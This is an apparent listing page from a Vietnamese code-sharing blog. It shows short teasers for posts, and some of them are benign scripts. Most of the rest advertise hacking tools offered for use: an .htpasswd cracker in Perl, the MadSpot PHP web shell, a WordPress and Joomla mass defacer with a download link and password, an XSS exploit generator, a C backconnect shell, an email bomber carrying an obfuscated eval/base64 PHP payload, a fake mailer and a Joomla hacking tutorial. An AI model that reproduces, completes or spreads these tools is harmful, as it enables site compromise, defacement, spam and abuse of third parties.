J2TEAM Security: A must-have extension for Chrome users. Install now!
Code

[PHP Script] Facebook Exchange System v1.0 - Autolike Script

Facebook Exchange System Facebook Exchange System là bộ mã nguồn PHP giúp bạn dễ dàng xây dựng một trang web cung cấp dịch vụ Facebook như tr…

[AutoIt] Hộp thoại thông báo với hiệu ứng trượt

Hộp thoại thông báo với hiệu ứng trượt Chia sẻ mã nguồn AutoIt tham khảo - tạo hộp thoại thông báo với hiệu ứng trượt (từ dưới lên). Đây là…

Share code get link nhạc từ SoundCloud

Share code get link Soundcloud, tải nhạc từ soundcloud. Hình demo: Rất đơn giản, chỉ việc nhập link soundcloud mà bạn cần download và nhấn Bắ…

WordPress Xploiter Released by Team Freak Coderz

WordPress Xploiter is free WordPress Vulnerability Scanner. It is the first version of WordPress Xploiter. This tool contains 251 WordPress Expl…

How Read Barrecode Or Qr Code Without A Scanner

Did you encounter once QR code and want to read it and you do not have a smart phone? Once you need to know numbers bar code, but you do not have …

5 Cách để học lập trình nhanh hơn – 5 Ways yo

Học lập trình không phải là chuyện mà ta có thể làm trong một sớm, một chiều, nhưng nó không phải là quá khó khăn. Có rất nhiều điều bạn có thể làm…

.htpasswd crack exploit

#! /usr/bin/perl # crack.pl by fwaggle root@fwaggle.net open (PASSFILE, "senhas"); my @passfile = <PASSFILE>; close PASSFILE; open (D…

MadSpot Shell v2 (Released)

This is offical 2nd php shell by Madleets Team this shell design specially for command line user . you can use Shell as terminal ..you type any co…

Prv8 wordpress and joomla mass defacer

Download: http://www.mediafire.com/?sftiwmr8szfseb2 Pass: junookyo

Skydreamer HTML5 responsive vCard

home : http://themeforest.net/item/skydream...-vcard/2950493 demo : http://simplesphere.net/html5/ Skydreamer HTML5 responsive vCard is a…

GenXE: Generate Xss Exploit

Description GenXE: Generate XSS Exploit (tool). Give us a simple cross-site scripting exploit: a…

vBulletin Modifications Collection (ver 3+4)

Tất cả những mod/product do Juno_okyo sưu tập. Đa số đều sử dụng tại: http://www.ghostclub.info/ Các bạn có thể xem demo tại forum đó! Link: http…

[Code] C backconnect

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/…

CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP

CodeXploiter is a White-Box scanner used for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on sel…

Xcode multiple vulnerability Scanner

XCode Exploit – Vulnurable & webshell Scanner help you to gather the dorks Link from Google. then you may check the results if its Vulnurable …

Email Bomber aka Mass Mailer

http://pastebin.com/qegBLu97 <?php eval(gzinflate(base64_decode(strrev(str_rot13('==jSkm93x3+exhvVPiR/chhnrCbvIkgBmg088wmXyuwj9gIGXqsKP…

Anonymous or Fake Mailer

Finally an Anonymous Mailer Script that actually works.... Password - prototype http://pastebin.com/Sng6eWxa <?php @session_start(); @se…

Code PHP - lấy địa chỉ IP của người dùng

Code PHP, lấy địa chỉ IP của người dùng, Get Remote IP Address in PHP , get user ip address using php Đoạn code PHP này sẽ trả về IP đang gửi req…

Joomla Exploit (Code)

In this video you will learn how to hack joomla Note:- This exploit only works on old version of joomla

[PHP] Get list username - vBulletin

<?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $max_page = …